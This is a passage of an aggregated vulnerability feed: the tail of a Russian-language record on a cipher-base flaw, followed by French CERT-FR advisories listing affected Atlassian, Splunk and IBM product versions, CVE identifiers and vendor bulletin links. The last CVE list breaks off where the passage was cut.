\u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e JSON-\u0444\u0430\u0439\u043b\u0430",
  "\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
  "\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": null,
  "\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
  "\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
  "\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
  "\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u041c\u0430\u043d\u0438\u043f\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u043c\u0438",
  "\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://github.com/browserify/cipher-base/pull/23\nhttps://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc",
  "\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
  "\u0422\u0438\u043f \u041f\u041e": "\u0421\u0435\u0442\u0435\u0432\u043e\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e, \u041f\u0440\u0438\u043a\u043b\u0430\u0434\u043d\u043e\u0435 \u041f\u041e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c",
  "\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-20",
  "\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0412\u044b\u0441\u043e\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 7,6)\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.1 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 9)\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS 4.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 9,1)"
}

CERTFR-2026-AVI-0065

Vulnerability from certfr_avis - Published: 2026-01-21 - Updated: 2026-01-21

De multiples vulnérabilités ont été découvertes dans les produits Atlassian. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

Vendor	Product	Description
Atlassian	Jira	Jira Software Server versions 11.3.x antérieures à 11.3.0
Atlassian	Confluence	Confluence Server versions antérieures à 8.5.31
Atlassian	Jira	Jira Service Management Data Center versions antérieures à 5.12.29
Atlassian	Jira	Jira Service Management Server versions 11.x antérieures à 11.2.1
Atlassian	Jira	Jira Service Management Data Center versions 11.x antérieures à 11.2.1
Atlassian	Jira	Jira Software Data Center versions 11.2.x antérieures à 11.2.1
Atlassian	Jira	Jira Software Server versions 11.2.x antérieures à 11.2.1
Atlassian	Jira	Jira Software Data Center versions 10.x antérieures à 10.3.16
Atlassian	Jira	Jira Service Management Server versions 10.x antérieures à 10.3.16
Atlassian	Jira	Jira Service Management Server versions 11.3.x antérieures à 11.3.0
Atlassian	Confluence	Confluence Server versions 9.x antérieures à 9.2.13
Atlassian	Confluence	Confluence Data Center versions 10.x antérieures à 10.2.2
Atlassian	Jira	Jira Software Data Center versions antérieures à 9.12.26
Atlassian	Jira	Jira Service Management Data Center versions 11.3.x antérieures à 11.3.1
Atlassian	Confluence	Confluence Data Center versions antérieures à 8.5.31
Atlassian	Jira	Jira Software Server versions antérieures à 9.12.26
Atlassian	Confluence	Confluence Data Center versions 9.x antérieures à 9.2.13
Atlassian	Jira	Jira Service Management Data Center versions 10.x antérieures à 10.3.16
Atlassian	Jira	Jira Software Server versions 10.x antérieures à 10.3.16
Atlassian	Jira	Jira Service Management Server versions antérieures à 5.12.29
Atlassian	Jira	Jira Software Data Center versions 11.3.x antérieures à 11.3.0

References

Title

Publication Time

Tags

Bulletin de sécurité Atlassian JSWSERVER-26667	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSDSERVER-16497	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSDSERVER-16496	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian CONFSERVER-101827	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSWSERVER-26665	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSDSERVER-16485	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSWSERVER-26661	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSDSERVER-16491	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian CONFSERVER-101878	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSDSERVER-16501	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSWSERVER-26663	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSDSERVER-16503	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSWSERVER-26662	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSDSERVER-16459	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSWSERVER-26654	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSWSERVER-26656	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian CONFSERVER-101872	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSDSERVER-16502	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian CONFSERVER-101842	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSDSERVER-16499	2026-01-20	vendor-advisory
Bulletin de sécurité Atlassian JSDSERVER-16465	2026-01-20	vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Jira Software Server versions 11.3.x ant\u00e9rieures \u00e0 11.3.0",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Confluence Server versions ant\u00e9rieures \u00e0 8.5.31",
      "product": {
        "name": "Confluence",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Service Management Data Center versions ant\u00e9rieures \u00e0 5.12.29",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Service Management Server versions 11.x ant\u00e9rieures \u00e0 11.2.1",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Service Management Data Center versions 11.x ant\u00e9rieures \u00e0 11.2.1",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Software Data Center versions 11.2.x ant\u00e9rieures \u00e0 11.2.1",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Software Server versions 11.2.x ant\u00e9rieures \u00e0 11.2.1",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Software Data Center versions 10.x ant\u00e9rieures \u00e0 10.3.16",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Service Management Server versions 10.x ant\u00e9rieures \u00e0 10.3.16",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Service Management Server versions 11.3.x ant\u00e9rieures \u00e0 11.3.0",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Confluence Server versions 9.x ant\u00e9rieures \u00e0 9.2.13",
      "product": {
        "name": "Confluence",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Confluence Data Center versions 10.x ant\u00e9rieures \u00e0 10.2.2",
      "product": {
        "name": "Confluence",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Software Data Center versions ant\u00e9rieures \u00e0 9.12.26",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Service Management Data Center versions 11.3.x ant\u00e9rieures \u00e0 11.3.1",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Confluence Data Center versions ant\u00e9rieures \u00e0 8.5.31",
      "product": {
        "name": "Confluence",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Software Server versions ant\u00e9rieures \u00e0 9.12.26",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Confluence Data Center versions 9.x ant\u00e9rieures \u00e0 9.2.13",
      "product": {
        "name": "Confluence",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Service Management Data Center versions 10.x ant\u00e9rieures \u00e0 10.3.16",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Software Server versions 10.x ant\u00e9rieures \u00e0 10.3.16",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Service Management Server versions ant\u00e9rieures \u00e0 5.12.29",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Software Data Center versions 11.3.x ant\u00e9rieures \u00e0 11.3.0",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2025-9287",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
    },
    {
      "name": "CVE-2025-49146",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-49146"
    },
    {
      "name": "CVE-2022-25883",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-25883"
    },
    {
      "name": "CVE-2025-66516",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-66516"
    },
    {
      "name": "CVE-2025-15284",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-15284"
    },
    {
      "name": "CVE-2024-21538",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-21538"
    },
    {
      "name": "CVE-2024-45296",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
    },
    {
      "name": "CVE-2021-3807",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-3807"
    },
    {
      "name": "CVE-2024-45801",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
    },
    {
      "name": "CVE-2022-45693",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-45693"
    },
    {
      "name": "CVE-2025-54988",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-54988"
    },
    {
      "name": "CVE-2025-9288",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
    },
    {
      "name": "CVE-2025-52434",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-52434"
    },
    {
      "name": "CVE-2025-53689",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53689"
    }
  ],
  "initial_release_date": "2026-01-21T00:00:00",
  "last_revision_date": "2026-01-21T00:00:00",
  "links": [],
  "reference": "CERTFR-2026-AVI-0065",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2026-01-21T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "D\u00e9ni de service \u00e0 distance"
    },
    {
      "description": "Injection de code indirecte \u00e0 distance (XSS)"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Atlassian. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Atlassian",
  "vendor_advisories": [
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26667",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26667"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16497",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16497"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16496",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16496"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-101827",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-101827"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26665",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26665"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16485",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16485"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26661",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26661"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16491",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16491"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-101878",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-101878"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16501",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16501"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26663",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26663"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16503",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16503"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26662",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26662"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16459",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16459"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26654",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26654"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26656",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26656"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-101872",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-101872"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16502",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16502"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-101842",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-101842"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16499",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16499"
    },
    {
      "published_at": "2026-01-20",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16465",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16465"
    }
  ]
}

CERTFR-2026-AVI-0118

Vulnerability from certfr_avis - Published: 2026-02-05 - Updated: 2026-02-05

De multiples vulnérabilités ont été découvertes dans les produits Splunk. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

	Vendor	Product	Description
	Splunk	SOAR	Splunk SOAR versions antérieures à 7.1.0

References

Title

Publication Time

Tags

Bulletin de sécurité Splunk SVD-2026-0201

2026-02-04

vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Splunk SOAR versions ant\u00e9rieures \u00e0 7.1.0",
      "product": {
        "name": "SOAR",
        "vendor": {
          "name": "Splunk",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2025-8715",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-8715"
    },
    {
      "name": "CVE-2025-32873",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-32873"
    },
    {
      "name": "CVE-2025-9287",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
    },
    {
      "name": "CVE-2025-57810",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-57810"
    },
    {
      "name": "CVE-2025-8713",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-8713"
    },
    {
      "name": "CVE-2025-9288",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
    },
    {
      "name": "CVE-2025-8714",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-8714"
    },
    {
      "name": "CVE-2024-47081",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-47081"
    },
    {
      "name": "CVE-2025-5889",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-5889"
    },
    {
      "name": "CVE-2025-47287",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-47287"
    }
  ],
  "initial_release_date": "2026-02-05T00:00:00",
  "last_revision_date": "2026-02-05T00:00:00",
  "links": [],
  "reference": "CERTFR-2026-AVI-0118",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2026-02-05T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Splunk. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Splunk",
  "vendor_advisories": [
    {
      "published_at": "2026-02-04",
      "title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0201",
      "url": "https://advisory.splunk.com/advisories/SVD-2026-0201"
    }
  ]
}

CERTFR-2026-AVI-0327

Vulnerability from certfr_avis - Published: 2026-03-20 - Updated: 2026-03-20

De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

Vendor	Product	Description
IBM	Sterling B2B Integrator	Sterling B2B Integrator et Sterling File Gateway versions 6.1.x antérieures à 6.1.2.8
IBM	Sterling	Sterling Control Center versions 6.4.2.x antérieures à 6.4.2.0 iFix01
IBM	Sterling B2B Integrator	Sterling B2B Integrator et Sterling File Gateway versions 6.2.2.x antérieures à 6.2.2.0_1
IBM	Informix Dynamic Server	Informix Dynamic Server versions 12.10.x antérieures à 12.10.xC16W6
IBM	WebSphere	WebSphere Hybrid Edition version 5.1 sans les correctifs de sécurité PH69757 et PH69729
IBM	Sterling B2B Integrator	Sterling B2B Integrator et Sterling File Gateway versions 6.2.x antérieures à 6.2.0.5_2
IBM	QRadar SIEM	QRadar SIEM versions 7.5.x antérieures à 7.5.0 UP15
IBM	QRadar Suite Software	QRadar Suite Software versions 1.10.12.x antérieures à 1.11.9.0
IBM	Sterling	Sterling Control Center versions 6.3.1.x antérieures à 6.3.1.0 iFix07
IBM	Cloud Pak	Cloud Pak for Security versions 1.10.x antérieures à 1.11.9.0
IBM	Sterling	Sterling Control Center versions 6.4.1.x antérieures à 6.4.1.0 iFix01
IBM	Sterling B2B Integrator	Sterling B2B Integrator et Sterling File Gateway versions 6.2.1.x antérieures à 6.2.1.1_2

References

Title

Publication Time

Tags

Bulletin de sécurité IBM 7266518	2026-03-17	vendor-advisory
Bulletin de sécurité IBM 7263574	2026-03-13	vendor-advisory
Bulletin de sécurité IBM 7266520	2026-03-17	vendor-advisory
Bulletin de sécurité IBM 7266678	2026-03-18	vendor-advisory
Bulletin de sécurité IBM 7266497	2026-03-17	vendor-advisory
Bulletin de sécurité IBM 7266324	2026-03-16	vendor-advisory
Bulletin de sécurité IBM 7266711	2026-03-18	vendor-advisory
Bulletin de sécurité IBM 7266677	2026-03-18	vendor-advisory
Bulletin de sécurité IBM 7266399	2026-03-17	vendor-advisory
Bulletin de sécurité IBM 7266321	2026-03-16	vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Sterling B2B Integrator et Sterling File Gateway versions 6.1.x ant\u00e9rieures \u00e0 6.1.2.8",
      "product": {
        "name": "Sterling B2B Integrator",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "Sterling Control Center versions 6.4.2.x ant\u00e9rieures \u00e0  6.4.2.0 iFix01",
      "product": {
        "name": "Sterling",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "Sterling B2B Integrator et Sterling File Gateway versions 6.2.2.x ant\u00e9rieures \u00e0 6.2.2.0_1",
      "product": {
        "name": "Sterling B2B Integrator",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "Informix Dynamic Server versions 12.10.x ant\u00e9rieures \u00e0 12.10.xC16W6",
      "product": {
        "name": "Informix Dynamic Server",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "WebSphere Hybrid Edition version 5.1 sans les correctifs de s\u00e9curit\u00e9 PH69757 et PH69729",
      "product": {
        "name": "WebSphere",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "Sterling B2B Integrator et Sterling File Gateway versions 6.2.x ant\u00e9rieures \u00e0 6.2.0.5_2",
      "product": {
        "name": "Sterling B2B Integrator",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "QRadar SIEM versions 7.5.x ant\u00e9rieures \u00e0 7.5.0 UP15",
      "product": {
        "name": "QRadar SIEM",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "QRadar Suite Software versions 1.10.12.x ant\u00e9rieures \u00e0 1.11.9.0",
      "product": {
        "name": "QRadar Suite Software",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "Sterling Control Center versions 6.3.1.x ant\u00e9rieures \u00e0 6.3.1.0 iFix07",
      "product": {
        "name": "Sterling",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "Cloud Pak for Security versions 1.10.x ant\u00e9rieures \u00e0 1.11.9.0",
      "product": {
        "name": "Cloud Pak",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "Sterling Control Center versions 6.4.1.x ant\u00e9rieures \u00e0 6.4.1.0 iFix01",
      "product": {
        "name": "Sterling",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "Sterling B2B Integrator et Sterling File Gateway versions 6.2.1.x ant\u00e9rieures \u00e0 6.2.1.1_2",
      "product": {
        "name": "Sterling B2B Integrator",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2025-32996",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-32996"
    },
    {
      "name": "CVE-2025-62727",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-62727"
    },
    {
      "name": "CVE-2026-21933",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-21933"
    },
    {
      "name": "CVE-2026-21932",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-21932"
    },
    {
      "name": "CVE-2025-68349",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
    },
    {
      "name": "CVE-2025-9287",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
    },
    {
      "name": "CVE-2025-14242",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-14242"
    },
    {
      "name": "CVE-2024-47831",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-47831"
    },
    {
      "name": "CVE-2025-32421",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-32421"
    },
    {
      "name": "CVE-2025-12084",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-12084"
    },
    {
      "name": "CVE-2025-53905",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53905"
    },
    {
      "name": "CVE-2025-6176",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-6176"
    },
    {
      "name": "CVE-2024-51479",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-51479"
    },
    {
      "name": "CVE-2025-15367",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-15367"
    },
    {
      "name": "CVE-2025-39933",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-39933"
    },
    {
      "name": "CVE-2025-22150",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22150"
    },
    {
      "name": "CVE-2022-46337",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-46337"
    },
    {
      "name": "CVE-2025-38022",
